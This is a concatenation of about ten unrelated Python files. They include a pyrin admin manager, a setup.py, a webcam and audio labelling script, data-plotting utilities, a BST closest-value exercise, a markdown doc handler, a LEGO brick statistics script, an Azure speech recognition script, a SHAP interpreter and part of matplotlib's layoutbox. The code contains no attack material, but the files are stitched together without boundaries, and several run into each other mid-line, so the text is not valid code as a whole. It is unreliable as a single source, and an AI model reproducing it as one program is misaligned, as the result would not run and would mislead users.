get_admin_base_url(self): """ gets admin base url. :rtype: str """ return self._base_url def get_admin_configurations(self): """ gets the admin api configurations. 
:returns: dict(bool enabled: enable admin api, bool authenticated: admin api access type, str url: admin api base url) :rtype: dict """ return config_services.get_active_section('admin') def get_default_category(self): """ gets the default category to be used for admin pages without category. :rtype: str """ category = config_services.get_active('admin', 'default_category') return category.upper() def register(self, instance, **options): """ registers the provided instance into available admin pages. :param pyrin.admin.interface.AbstractAdminPage instance: admin page instance. :keyword bool replace: specifies that if another admin page with the same name or the same entity exists, replace it. defaults to False if not provided and raises an error. :raises InvalidAdminPageTypeError: invalid admin page type error. :raises DuplicatedAdminPageError: duplicated admin page error. """ if not isinstance(instance, AbstractAdminPage): raise InvalidAdminPageTypeError('Input parameter [{admin}] is ' 'not an instance of [{base}].' .format(admin=instance, base=AbstractAdminPage)) replace = options.get('replace', False) if instance.get_register_name() in self._admin_pages: if replace is not True: raise DuplicatedAdminPageError('There is another registered admin page ' 'with register name [{name}] but "replace" ' 'option is not set, so admin page [{instance}] ' 'could not be registered.' .format(name=instance.get_register_name(), instance=instance)) self._remove_from_pages(instance.get_register_name()) if instance.get_entity() in self._admin_entities: if replace is not True: raise DuplicatedAdminPageError('There is another registered admin page ' 'for entity [{entity}] but "replace" ' 'option is not set, so admin page [{instance}] ' 'could not be registered.' .format(entity=instance.get_entity(), instance=instance)) self._remove_from_entities(instance.get_entity()) self._admin_pages[instance.get_register_name()] = instance self._admin_entities[instance.get_entity()] = instance def get(self, register_name, pk): """ gets an entity with given primary key. :param str register_name: register name of admin page. :param object pk: primary key of entity to be get. :raises AdminOperationNotAllowedError: admin operation not allowed error. :raises EntityNotFoundError: entity not found error. :rtype: pyrin.database.model.base.BaseEntity """ admin = self._get_admin_page(register_name) if not admin.has_get_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow get operation.') .format(name=admin.get_register_name())) return admin.get(pk) def find(self, register_name, **filters): """ performs find on given admin page and returns the result. :param str register_name: register name of admin page. :keyword **filters: all filters to be passed to related admin page. :rtype: list[ROW_RESULT] """ admin = self._get_admin_page(register_name) return admin.find(**filters) def create(self, register_name, **data): """ performs create on given admin page. :param str register_name: register name of admin page. :keyword **data: all data to be passed to related admin page for data creation. :raises AdminOperationNotAllowedError: admin operation not allowed error. 
:rtype: object """ admin = self._get_admin_page(register_name) if not admin.has_create_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow create operation.') .format(name=admin.get_register_name())) return admin.create(**data) def update(self, register_name, pk, **data): """ performs update on given admin page. :param str register_name: register name of admin page. :param object pk: entity primary key to be updated. :keyword **data: all data to be passed to related admin page for data creation. :raises AdminOperationNotAllowedError: admin operation not allowed error. :raises EntityNotFoundError: entity not found error. """ admin = self._get_admin_page(register_name) if not admin.has_update_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow update operation.') .format(name=admin.get_register_name())) return admin.update(pk, **data) def remove(self, register_name, pk): """ performs remove on given admin page. :param str register_name: register name of admin page. :param object pk: entity primary key to be removed. :raises AdminOperationNotAllowedError: admin operation not allowed error. """ admin = self._get_admin_page(register_name) if not admin.has_remove_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow remove operation.') .format(name=admin.get_register_name())) return admin.remove(pk) def remove_bulk(self, register_name, pk): """ performs remove bulk on given admin page. :param str register_name: register name of admin page. :param object | list[object] pk: entity primary keys to be removed. :raises AdminOperationNotAllowedError: admin operation not allowed error. """ admin = self._get_admin_page(register_name) if not admin.has_remove_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow remove operation.') .format(name=admin.get_register_name())) return admin.remove_bulk(pk) def remove_all(self, register_name): """ performs remove all on given admin page. :param str register_name: register name of admin page. :raises AdminOperationNotAllowedError: admin operation not allowed error. """ admin = self._get_admin_page(register_name) if not admin.has_remove_all_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow remove all operation.') .format(name=admin.get_register_name())) return admin.remove_all() def populate_main_metadata(self): """ populates all admin pages main metadata. """ metadata = dict() for name, admin in self._admin_pages.items(): pages = metadata.setdefault(admin.get_category(), []) pages.append(admin.get_main_metadata()) result = list() sorted_categories = sorted(metadata.keys()) for category in sorted_categories: pages = metadata.get(category) sorted_pages = dict_utils.extended_sort(pages, 'plural_name') single_category = dict() single_category[category] = sorted_pages result.append(single_category) self._admin_metadata = tuple(result) def get_main_metadata(self): """ gets all admin pages main metadata. :raises AdminPagesHaveNotLoadedError: admin pages have not loaded error. :returns: dict(list pages, dict configs) :rtype: dict """ if self._admin_metadata is None: raise AdminPagesHaveNotLoadedError('Admin pages have not loaded yet.') result = dict(pages=list(self._admin_metadata), configs=self.get_configs()) return result def get_find_metadata(self, register_name): """ gets the find metadata for given admin page. :param str register_name: register name of admin page. 
:rtype: dict """ admin = self._get_admin_page(register_name) return admin.get_find_metadata() def get_create_metadata(self, register_name): """ gets the create metadata for given admin page. :param str register_name: register name of admin page. :rtype: dict """ admin = self._get_admin_page(register_name) return admin.get_create_metadata() def get_update_metadata(self, register_name): """ gets the update metadata for given admin page. :param str register_name: register name of admin page. :rtype: dict """ admin = self._get_admin_page(register_name) return admin.get_update_metadata() def register_name_for(self, entity): """ gets the admin page register name for given entity class. it raises an error if the given entity does not have an admin page. :param type[pyrin.database.model.base.BaseEntity] entity: the entity class of admin page to get its register name. :raises AdminPageNotFoundError: admin page not found error. :rtype: str """ admin = self.try_get_admin_page(entity) if admin is None: raise AdminPageNotFoundError(_('Entity [{entity}] does not have an admin page.') .format(entity=entity)) return admin.get_register_name() def url_for(self, register_name): """ gets the base url for given admin page. :param str register_name: admin page register name. :rtype: str """ return f'{self.get_admin_base_url()}{register_name.lower()}/' def get_list_field_type(self, form_field_type): """ gets the equivalent list field type for given form field type. it may return None. :param str form_field_type: form field type to get its list field type. :enum form_field_type: BOOLEAN = 'boolean' DATE = 'date' DATETIME = 'datetime' TIME = 'time' EMAIL = 'email' FILE = 'file' NUMBER = 'number' PASSWORD = 'password' TELEPHONE = 'telephone' STRING = 'string' TEXT = 'text' URL = 'url' UUID = 'uuid' IPV4 = 'ipv4' IPV6 = 'ipv6' OBJECT = 'object' :rtype: str """ return self._type_map.get(form_field_type) def populate_caches(self): """ populates required caches of all registered admin pages. :returns: count of registered admin pages :rtype: int """ for admin in self._admin_pages.values(): admin.populate_caches() return len(self._admin_pages) def get_configs(self): """ gets the required configs of admin api. :returns: dict(str panel_name, str page_key, str page_size_key, str ordering_key, str locale_key, str timezone_key, str search_param, str hidden_pk_name) :rtype: dict """ if self._configs is not None: return deepcopy(self._configs) panel_name = config_services.get_active('admin', 'panel_name') search_param = config_services.get_active('admin', 'search_param') hidden_pk_name = config_services.get_active('admin', 'hidden_pk_name') page_key, page_size_key = paging_services.get_paging_param_names() ordering_key = database_services.get_ordering_key() locale_key = locale_services.get_locale_key() timezone_key = datetime_services.get_timezone_key() result = dict(panel_name=panel_name, page_key=page_key, page_size_key=page_size_key, ordering_key=ordering_key, locale_key=locale_key, timezone_key=timezone_key, search_param=search_param, hidden_pk_name=hidden_pk_name) self._configs = deepcopy(result) return result def login(self, username, password, **options): """ logs in an internal user with given info into admin panel. :param str username: username. :param str password: password. :raises ProvidedUsernameOrPasswordAreIncorrect: provided username or password are incorrect. 
:returns: dict(str access_token) :rtype: dict """ return authentication_services.login(username, password, InternalAuthenticatorEnum.ADMIN, **options) from setuptools import setup setup( name='flexio-flow', version='0.0.0', packages=['', 'tests', 'tests.Schemes', 'tests.Schemes.Package', 'tests.FlexioFlow', 'tests.FlexioFlow.Actions', 'utils', 'Schemes', 'Schemes.Maven', 'Schemes.Docker', 'Schemes.Package', 'Schemes.Composer', 'Exceptions', 'FlexioFlow', 'FlexioFlow.Actions', 'VersionControl', 'VersionControl.Git', 'VersionControl.Git.Branches', 'VersionControl.Git.Branches.Hotfix', 'VersionControl.Git.Branches.Release'], package_dir={'': 'src'}, url='http://flexio.fr', license='Apache License 2.0', author='thomas', author_email='', description='' ) VideoStream.py import cv2 # import sys import numpy as np import datetime # import time import pyaudio # from audiostream import * from store_data import data_handler def newAverageColorGrayscale(image): ''' Finds the average color of an image's pixels. input: image object from cv2 output: single pixel value; would return 3 values if we were not doing grayscale ''' average_color_per_row = np.average(image, axis=0) average_color = np.average(average_color_per_row, axis=0) return average_color def callback(in_data, frame_count, time_info, flag): global b, a, fulldata, dry_data, frames audio_data = np.frombuffer(in_data, dtype=np.float32) dry_data = np.append(dry_data, audio_data) fulldata = np.append(fulldata, audio_data) return (audio_data, pyaudio.paContinue) if __name__ == '__main__': # Initialize an input (no key creates a value of 255) cap = cv2.VideoCapture(0) user_input = cv2.waitKey(0) & 0xFF data_store = data_handler() moments = {} # data label dictionary label = {ord('b'): 'tool break', ord('d'): 'tool dull', ord('g'): 'machine okay', ord('n'): 'machine problem', ord('i'): 'machine idle', 255: 'No Entry'} running = "n" chunk = 1024 # fulldata = np.array([]) # dry_data = np.array([]) p = pyaudio.PyAudio() stream = p.open(format=pyaudio.paInt16, channels=1, rate=16000, input=True, frames_per_buffer=1024) # in_speech_bf = False # ##decoder.start_utt() # while True: # if stream.is_stopped(): # stream.start_stream() # buf = stream.read(1024) # if buf: # stream.stop_stream() # decoder.process_raw(buf, False, False) # initialize average color for something to compare to average_color = 0 # from audiostream # tt = TapTester() counter = 0 run = True while run: # listen # audio = tt.listen() # read a frame from camera ret, image = cap.read() # show the picture cv2.imshow('image', image) # listen for keyboard input last_input = user_input user_input = cv2.waitKey(1) & 0xFF # quitting sequence if user_input == ord('q'): break # keep the last pressed key as label if user_input == 255 and last_input != 255: user_input = last_input # TODO: incorporate sound into the data package moments["audio"] = "aud" moments["image"] = image moments["timestamp"] = datetime.datetime.now() moments["label"] = label.get(user_input, None) moments['frame_width'] = cap.get(propId=3) moments['frame_height'] = cap.get(propId=4) # TODO: Incorporate BOTO streaming into data_handler program # data_store.write(moments) if counter > 30: run = False counter += 1 # Release the capture cap.release() cv2.destroyAllWindows() # for moment in moments: # print(moment.get('audio', 'Not Found')) HaoyueXU99/Data-Analysis lectures/audio_feed_stream_recommendation/utils.py from sklearn import metrics import lightgbm as lgb from sklearn.model_selection import train_test_split import pandas as pd
def auc(y,pre): fpr, tpr, thresholds = metrics.roc_curve(y, pre) auc=metrics.auc(fpr, tpr) return auc def getAmountLevel(t): if t<=10: return 1 elif t<=100: return 2 else: return 3 def time_cut(t): if t<=0: return ['0',1] elif t<=3: return ['(0,3])',2] elif t<=14: return ['(3,14])',3] elif t<=90: return ['(14,90])',4] elif t<=180: return ['(90,180])',5] else: return ['>180',6] def fans_cut(t): if t<10: return 1 elif t<67: return 2 elif t<348: return 3 else: return 4 import matplotlib.pyplot as plt import matplotlib as mpl def draw1(data,fea_values,fea,ylim_value=0): x = fea_values y = data[data.label==0][[fea,'label']].groupby([fea]).count().reset_index().label.values y1 = data[data.label==1][[fea,'label']].groupby([fea]).count().reset_index().label.values plt.xlabel(fea+" gift count") plt.bar(x, y, align="center", color="c", tick_label=fea_values, label="click=0") plt.bar(x, y1, align="center", bottom=y, color="g", label="click=1") plt.legend() value=780000 if ylim_value!=0: value=ylim_value plt.ylim(0, value) plt.show() def draw2(data,fea_values,fea,ascending_value): ## bar chart import matplotlib.pyplot as plt import numpy as np from matplotlib import pyplot as plt fig,ax=plt.subplots() # generate the data #x = np.linspace(0, 20, 20) tmp=data[fea_values+['label','user_id']].groupby(fea_values+['label']).count().reset_index()\ .sort_values(by=[fea_values[1]],ascending=0)[[fea_values[0],'label','user_id']] tmp=pd.pivot_table(tmp,index=fea_values[0],columns=['label']) #newtmp=tmp.T[['>180','(90,180])','(14,90])', '(3,14])','(0,3])','0']] newtmp=tmp.T[['0','(0,3])', '(3,14])','(14,90])','(90,180])','>180']] if(ascending_value==True): newtmp=tmp.T[['>180','(90,180])','(14,90])', '(3,14])','(0,3])','0']] col=[i for i in newtmp] # column labels are taken from the header value=newtmp.T.values # convert the per-label counts into a matrix, i.e. [[25,24,22],[50.0,31.0,23.5],...]
value=value[np.lexsort(value[:,::-1].T)] v1=[i[0]+i[1] for i in value] # first barh call: y values are the totals of both label counts (click=0 + click=1) v2=[i[0] for i in value] # second barh call: y values are only the click=0 counts, drawn over the totals so the remainder reads as click=1 #v1.sort(reverse=ascending_value) #v2.sort(reverse=ascending_value) ax.barh(col,v1,color="g") ax.barh(col,v2,color="c") ax.set(xlabel=fea,title=fea+" gift count") #ax.text(1998,184,"(HDB)") # set the annotation text ax.legend(["click=1","click=0"]) # set the legend plt.show() """ # Average: O(log(N)) time (we only ever follow one branch, as in a BST search) | O(log(N)) space (one call-stack frame per level visited), or O(D) space where D is the depth of the branch # if implemented iteratively the space complexity becomes O(1) - we won't be using frames on the call stack # Worst: O(N) time (when the BST has only 1 branch) | O(N) space # if implemented iteratively the space complexity becomes O(1) BST with 1 branch ONLY: 10 | 15 | 22 | 30 find the closest value to 12: 10 / \ 5 15 / \ / \ 2 5 13 22 / / \ 1 None 14 assign the variable 'closest = infinity' (best candidate for the closest value so far) absolute difference = |rootValue (which is currentNode) - targetValue (12)| if the |absoluteDifference| between the currentNode's value and the target is smaller than the |absoluteDifference| between closest and the target, then closest gets updated to the value with the smaller difference to the target |infinity - 12| = infinity |10 - 12| = 2 is infinity < 2? obviously NO, therefore 10 (currentNode) is closer to 12 (targetValue) than infinity is. Hence the closest value gets updated to the currentNode -> closest = 10 since 12 (target) > 10 (rootValue) and we are in a BST, only the right subtree of 10 (values >= 10) can hold something closer; the left subtree of 10 (values <= 10) doesn't have to be explored and gets ignored Next value is 15 so, |15 (currentNode) - 12 (targetValue)| = 3 vs |10 (closest so far) - 12 (targetValue)| = 2 |15 - 12| = 3 vs |10 - 12| = 2 since 3 (absolute difference of 15) > 2 (absolute difference of 10), 15 is farther from 12 than 10 is, therefore we don't update the closest value - it remains 'closest = 10' Because 12 < 15 we go left; the right subtree of 15 (22 and beyond) gets eliminated, since going right can only increase the difference # on average that eliminates half of the BST Next value = 13 |13 - 12| = 1 vs |10 - 12| = 2 so, 1 < 2 therefore 'closest = 13' (value gets updated) Also, 12 (target) < 13 (currentNode) -> so we go left from 13; its right child 14 is eliminated, the left child is None, and the traversal stops -> Answer is 13 Edge case to make it optimal: if |currentValue - targetValue| = 0 you have found the closest value (STOP HERE); 'closest' gets updated to that value and is returned """ # Average: O(log(n)) time | O(log(n)) space # Worst: O(n) time | O(n) space def findClosestValueInBst(tree, target): return findClosestValueInBstHelper(tree, target, tree.value) # initial closest; float("inf") would also work as the starting value def findClosestValueInBstHelper(tree, target, closest): if tree is None: # Recursive base case - where the currentNode is NULL return closest if abs(target - closest) > abs(target - tree.value): closest = tree.value # closest value gets updated if target < tree.value: # if target < tree.value (currentNode) # then, ONLY explore left subtree return findClosestValueInBstHelper(tree.left, target, closest) elif target > tree.value: # if target > tree.value (currentNode) # then, ONLY explore right subtree return findClosestValueInBstHelper(tree.right, target, closest) else: return closest # This is the class of the input tree. Do not edit.
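A quick sanity check of the walkthrough above (illustrative only, not part of the original snippet). It assumes the BST node class defined alongside this code (constructor takes a value; left and right start as None) and the recursive findClosestValueInBst defined above; the helper name build_example_tree is made up for this sketch.

def build_example_tree():
    # Hypothetical helper: builds the example tree from the walkthrough diagram.
    root = BST(10)
    root.left = BST(5)
    root.right = BST(15)
    root.left.left = BST(2)
    root.left.right = BST(5)
    root.left.left.left = BST(1)
    root.right.left = BST(13)
    root.right.right = BST(22)
    root.right.left.right = BST(14)
    return root

# Expected: findClosestValueInBst(build_example_tree(), 12) returns 13,
# visiting only 10 -> 15 -> 13 and never touching 2, 5, 1, 22 or 14.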
class BST: def __init__(self, value): self.value = value self.left = None self.right = None # Average: O(log(n)) time | O(1) space # Worst: O(n) time | O(1) space def findClosestValueInBst(tree, target): return findClosestValueInBstHelper(tree, target, tree.value) # tree.value = float("inf") infinity def findClosestValueInBstHelper(tree, target, closest): currentNode = tree while currentNode is not None: if abs(target- closest) > abs(target - currentNode.value): closest = currentNode.value if target < currentNode.value: currentNode = currentNode.left elif target > currentNode.value: currentNode = currentNode.right else: break return closest # This is the class of the input tree. Do not edit. class BST: def __init__(self, value): self.value = value self.left = None self.right = Noneimport markdown import io import os.path from .base_handler import BaseHandler class DocHandler(BaseHandler): docbase = os.path.realpath( os.path.join(os.path.dirname(__file__), '..', 'doc-src') ) def get(self, slug): buffer = io.BytesIO() if slug is not None: slug = slug.replace('/', '') if slug not in ('ruby', 'python', 'javascript', 'quickref'): self.redirect('/doc/javascript') else: doc = slug markdown.markdownFromFile( os.path.join(self.docbase, doc + '.md'), buffer, extensions=['markdown.extensions.fenced_code', 'markdown.extensions.toc'], extension_configs={ 'markdown.extensions.toc': { 'title': 'Tabla de contenidos', }, }, ) buffer.seek(0) self.render('container.html', body=buffer.read()) #!/usr/bin/env python import torch from torchvision.transforms.functional import to_tensor import numpy import PIL.Image as Image import tqdm from torch_scatter import scatter_add from ltron.gym.standard_envs import graph_supervision_env from ltron.torch.gym_tensor import ( gym_space_to_tensors, gym_space_list_to_tensors, graph_to_gym_space) from ltron.gym.brick_env import async_brick_env if __name__ == '__main__': num_processes = 8 train_dataset = 'rando_micro_wheels' train_split = 'all' train_subset = None segmentation_width, segmentation_height = 64, 64 multi_hide = True max_instances_per_step = 8 randomize_viewpoint = True randomize_colors = True train_env = async_brick_env( num_processes, graph_supervision_env, dataset=train_dataset, split=train_split, subset=train_subset, load_scenes=True, dataset_reset_mode='multi_pass', segmentation_width = segmentation_width, segmentation_height = segmentation_height, randomize_viewpoint=randomize_viewpoint, randomize_viewpoint_frequency='reset', randomize_colors=randomize_colors) num_steps = 1000 instance_pixel_data = {} instance_z_data = {} step_observations = train_env.reset() for i in tqdm.tqdm(range(num_steps//num_processes)): step_tensors = gym_space_to_tensors( step_observations, train_env.single_observation_space, image_transform=to_tensor) seg = step_tensors['segmentation_render'] instance_pixel_counts = scatter_add( torch.ones_like(seg).view(num_processes, -1), seg.view(num_processes, -1)) for b in range(num_processes): save_frame = False for j in range(instance_pixel_counts.shape[-1]): if instance_pixel_counts[b,j] == 0: continue instance_label = int(( step_tensors['graph_label'][b]['instance_label'][j])) if instance_label == 0: continue if instance_label not in instance_pixel_data: instance_pixel_data[instance_label] = [] instance_z_data[instance_label] = [] instance_pixel_data[instance_label].append( instance_pixel_counts[b,j]) z = -step_tensors['brick_position']['camera'][b,j,2] instance_z_data[instance_label].append(z) ''' if z > 700 or z < 200: save_frame = True 
if z > 700: print('far', i, b) else: print('near', i, b) ''' ''' if save_frame: image = step_tensors['color_render'][b].cpu().numpy() * 255 image = numpy.moveaxis(image,0,2) image = image.astype(numpy.uint8) Image.fromarray(image).save('tmp_%i_%i.png'%(i,b)) ''' step_observations = train_env.reset() print('Class: instance density, min p, max p, avg p, min z, max z, avg z') total_instances = sum([len(v) for v in instance_pixel_data.values()]) min_all_z = float('inf') max_all_z = -float('inf') for class_label in sorted(instance_pixel_data.keys()): num_instances = len(instance_pixel_data[class_label]) instance_density = num_instances/total_instances min_pixels = min(instance_pixel_data[class_label]) max_pixels = max(instance_pixel_data[class_label]) avg_pixels = sum(instance_pixel_data[class_label])/num_instances min_z = min(instance_z_data[class_label]) max_z = max(instance_z_data[class_label]) avg_z = sum(instance_z_data[class_label])/num_instances print(' %i: %.04f, %i, %i, %i, %.02f, %.02f, %.02f'%( class_label, instance_density, min_pixels, max_pixels, avg_pixels, min_z, max_z, avg_z)) min_all_z = min(min_all_z, min_z) max_all_z = max(max_all_z, max_z) print('Min/Max Z: %.02f, %.02f'%(min_all_z, max_all_z)) MasayukiTanaka0412/Shikibu import speech_recognition as sr import os import sys import datetime AUDIO_FILE = sys.argv[1] LANGUAGE = sys.argv[2] #AUDIO_FILE = "out001.wav" #LANGUAGE = "ja-JP" print("AUDIOFILE = {}".format(AUDIO_FILE)) print("LANGUAGE = {}".format(LANGUAGE)) # recognize speech using Microsoft Azure Speech AZURE_SPEECH_KEY = os.environ['AZURE_SPEECH_KEY'] # use the audio file as the audio source r = sr.Recognizer() offset =0 print("Recognition Result") with sr.AudioFile(AUDIO_FILE) as source: while offset < source.DURATION: audio = r.record(source,duration=60) # read the entire audio file print("{} - {} ".format(datetime.timedelta(seconds=offset), datetime.timedelta(seconds=offset +60))) offset = offset + 60 try: result = r.recognize_azure(audio, key=AZURE_SPEECH_KEY,location="japaneast",language=LANGUAGE,show_all=False,result_format="simple",profanity="raw") print(result) except sr.UnknownValueError: print("Microsoft Azure Speech could not understand audio") except sr.RequestError as e: print("Could not request results from Microsoft Azure Speech service; {0}".format(e)) print("End of Recognition")from numpy.lib.npyio import save from pandas.core import base from pandas.core.series import Series from pandas.io import feather_format import shap from tensorflow.keras.models import Model from lightgbm import LGBMClassifier import pandas as pd import matplotlib.pyplot as plt from ..util.util import basename, filename_subfix class ShapInterpreter(object): def __init__(self, model, background_data, schema, preprocess_dict={}): """ShapInterpreter Parameters ---------- model : LGBMClassifier or tf.keras.models.Model model to be interpreted background_data : pd.DataFrame background data used in the evaluation schema : dict description of the data preprocess_dict : dict, optional preprocessors of the model, by default {} """ if background_data is not None: if schema["label"] in background_data: background_data = background_data.drop(schema["label"], axis=1) if isinstance(model, Model): if background_data is None: raise Exception( "background_data must not be None for Keras Model") def f(X): return model.predict([X[:, i] for i in range(X.shape[1])]).flatten() self.predict = f self.explainer = shap.KernelExplainer(f, background_data) self.type = "kernel" elif isinstance(model, 
LGBMClassifier): self.explainer = shap.TreeExplainer(model) self.type = "lgb" self.background_data = background_data self.schema = schema self.preprocess_dict = preprocess_dict def _cal_shap_value(self, df, nsamples=500, use_background=True): df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) if isinstance(df, pd.Series): for col in df.index: if col in self.preprocess_dict: if self.preprocess_dict[col]["type"] == "Category": df[col] = self.preprocess_dict[col][ "processor"].transform([str(df[col])])[0] else: df[col] = self.preprocess_dict[col][ "processor"].transform(df[col].reshape( (-1, 1)))[0][0] df = pd.to_numeric(df) else: for col in df.columns: if col in self.preprocess_dict: if self.preprocess_dict[col]["type"] == "Category": df[col] = self.preprocess_dict[col]["processor"].transform( df[col].astype(str)) else: df[col] = self.preprocess_dict[col]["processor"].transform( df[[col]]) if self.type == "kernel": if isinstance(df, pd.Series): shap_values = self.explainer.shap_values(df, nsamples=nsamples) else: if use_background: shap_values = self.explainer.shap_values(df, nsamples=nsamples) else: explainer = shap.KernelExplainer(self.predict, df) shap_values = explainer.shap_values(df, nsamples=nsamples) return shap_values, df elif self.type == "lgb": if isinstance(df, pd.Series): df = df.to_frame().transpose() use_background = True if self.background_data is None: raise Exception( "for one point shap_value, the background_data is required!" ) if self.background_data is not None and use_background: df_all = pd.concat([df, self.background_data], axis=0) shap_values = self.explainer.shap_values(df_all) else: shap_values = self.explainer.shap_values(df) return shap_values[1][:df.shape[0]], df def _explainer(self, df, nsamples=500, use_background=True): df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) if isinstance(df, pd.Series): for col in df.index: if col in self.preprocess_dict: if self.preprocess_dict[col]["type"] == "Category": df[col] = self.preprocess_dict[col][ "processor"].transform([str(df[col])])[0] else: df[col] = self.preprocess_dict[col][ "processor"].transform(df[col].reshape( (-1, 1)))[0][0] df = pd.to_numeric(df) else: for col in df.columns: if col in self.preprocess_dict: if self.preprocess_dict[col]["type"] == "Category": df[col] = self.preprocess_dict[col]["processor"].transform( df[col].astype(str)) else: df[col] = self.preprocess_dict[col]["processor"].transform( df[[col]]) if self.type == "kernel": if isinstance(df, pd.Series): shap_values = self.explainer(df, nsamples=nsamples) else: if use_background: shap_values = self.explainer(df, nsamples=nsamples) else: explainer = shap.KernelExplainer(self.predict, df) shap_values = explainer(df, nsamples=nsamples) return shap_values elif self.type == "lgb": if isinstance(df, pd.Series): df = df.to_frame().transpose() use_background = True if self.background_data is None: raise Exception( "for one point shap_value, the background_data is required!" 
) if self.background_data is not None and use_background: df_all = pd.concat([df, self.background_data], axis=0) shap_values = self.explainer(df_all) else: shap_values = self.explainer(df) return shap_values[1] def cal_shap_value(self, df, nsamples=500, use_background=True): """calculate the shap values of one point of several points Parameters ---------- df : pd.Series or pd.DataFrame points to be interperted nsamples : int, optional permutation times, by default 500 use_background : bool, optional if use the background data, for one point, it must be True, by default True Returns ------- pd.DataFrame shap values of one point of several points """ shap_value, _ = self._cal_shap_value(df, nsamples=nsamples, use_background=use_background) if len(shap_value.shape) == 1: return pd.DataFrame(shap_value.reshape(1, len(shap_value)), columns=[ col for col in df.index if col != self.schema['label'] ]) else: return pd.DataFrame(shap_value, columns=[ col for col in df.columns if col != self.schema['label'] ]) def force_plot(self, df, nsamples=500, savefig=None, use_background=True): """plot the shap values of one point of several points Parameters ---------- df : pd.Series or pd.DataFrame points to be interperted nsamples : int, optional permutation times, by default 500 savefig : string, optional path to save the fig, by default None use_background : bool, optional if use the background data, for one point, it must be True, by default True """ # assert isinstance(df, pd.Series) if isinstance(df, pd.DataFrame): ins = df.shape[0] if ins == 1: self.force_plot(df.iloc[0, :], nsamples=nsamples, savefig=savefig, use_background=use_background) else: if savefig is None: for i in range(ins): self.force_plot(df.iloc[i, :], nsamples=nsamples, savefig=savefig, use_background=use_background) else: filen, subfix = filename_subfix(savefig) subfix = ".{}".format(subfix) if subfix != "" else "" for i in range(ins): self.force_plot(df.iloc[i, :], nsamples=nsamples, savefig="{}_{}{}".format( filen, i, subfix), use_background=use_background) elif isinstance(df, pd.Series): df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) shap_values, _ = self._cal_shap_value(df, nsamples, use_background=use_background) if savefig is not None: plt.clf() if self.type == "kernel": shap.force_plot(self.explainer.expected_value, shap_values, df, matplotlib=True, show=False) elif self.type == "lgb": shap.force_plot(self.explainer.expected_value[1], shap_values, df, matplotlib=True, show=False) if savefig is None: plt.show() if savefig is not None: plt.savefig(savefig, dpi=150, bbox_inches='tight') else: raise ("Unsupported input type {}".format(type(df))) def summary_plot(self, df, nsamples=500, savefig=None, use_background=True, plot_type=None): """plot the summary of the shap values of the model Parameters ---------- df : pd.DataFrame points to be interperted nsamples : int, optional permutation times, by default 500 savefig : string, optional path to save the fig, by default None use_background : bool, optional if use the background data, for one point, it must be True, by default True plot_type : “dot” (default for single output), “bar” (default for multi-output), “violin”, or “compact_dot”. What type of summary plot to produce. Note that “compact_dot” is only used for SHAP interaction values. 
""" if isinstance(df, pd.Series) or df.shape[0] == 1: self.force_plot(df, nsamples, savefig=savefig, use_background=use_background) else: df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) shap_values, _ = self._cal_shap_value(df, nsamples, use_background=use_background) if savefig is not None: plt.clf() shap.summary_plot(shap_values, df, show=False, plot_type=plot_type) if savefig is None: plt.show() if savefig is not None: plt.savefig(savefig, dpi=150, bbox_inches='tight') def dependence_plot(self, df, feature_name=None, nsamples=500, savefig=None, use_background=True): assert isinstance(df, pd.DataFrame) and df.shape[0] > 1 df = df.copy() if self.schema["label"] in df: df.pop(self.schema["label"]) shap_values, preprocess_df = self._cal_shap_value(df, nsamples, use_background=use_background) if feature_name is None: for col in df.columns: shap.dependence_plot(col, shap_values, preprocess_df, display_features=df) else: if isinstance(feature_name, str): shap.dependence_plot(feature_name, shap_values, preprocess_df, display_features=df) elif isinstance(feature_name, (list, tuple)): for col in feature_name: shap.dependence_plot(col, shap_values, preprocess_df, display_features=df)""" Conventions: "constrain_x" means to constrain the variable with either another kiwisolver variable, or a float. i.e. `constrain_width(0.2)` will set a constraint that the width has to be 0.2 and this constraint is permanent - i.e. it will not be removed if it becomes obsolete. "edit_x" means to set x to a value (just a float), and that this value can change. So `edit_width(0.2)` will set width to be 0.2, but `edit_width(0.3)` will allow it to change to 0.3 later. Note that these values are still just "suggestions" in `kiwisolver` parlance, and could be over-ridden by other constrains. """ import itertools import kiwisolver as kiwi import logging import numpy as np _log = logging.getLogger(__name__) # renderers can be complicated def get_renderer(fig): if fig._cachedRenderer: renderer = fig._cachedRenderer else: canvas = fig.canvas if canvas and hasattr(canvas, "get_renderer"): renderer = canvas.get_renderer() else: # not sure if this can happen # seems to with PDF... _log.info("constrained_layout : falling back to Agg renderer") from matplotlib.backends.backend_agg import FigureCanvasAgg canvas = FigureCanvasAgg(fig) renderer = canvas.get_renderer() return renderer class LayoutBox: """ Basic rectangle representation using kiwi solver variables """ def __init__(self, parent=None, name='', tightwidth=False, tightheight=False, artist=None, lower_left=(0, 0), upper_right=(1, 1), pos=False, subplot=False, h_pad=None, w_pad=None): Variable = kiwi.Variable self.parent = parent self.name = name sn = self.name + '_' if parent is None: self.solver = kiwi.Solver() self.constrained_layout_called = 0 else: self.solver = parent.solver self.constrained_layout_called = None # parent wants to know about this child! parent.add_child(self) # keep track of artist associated w/ this layout. Can be none self.artist = artist # keep track if this box is supposed to be a pos that is constrained # by the parent. self.pos = pos # keep track of whether we need to match this subplot up with others. 
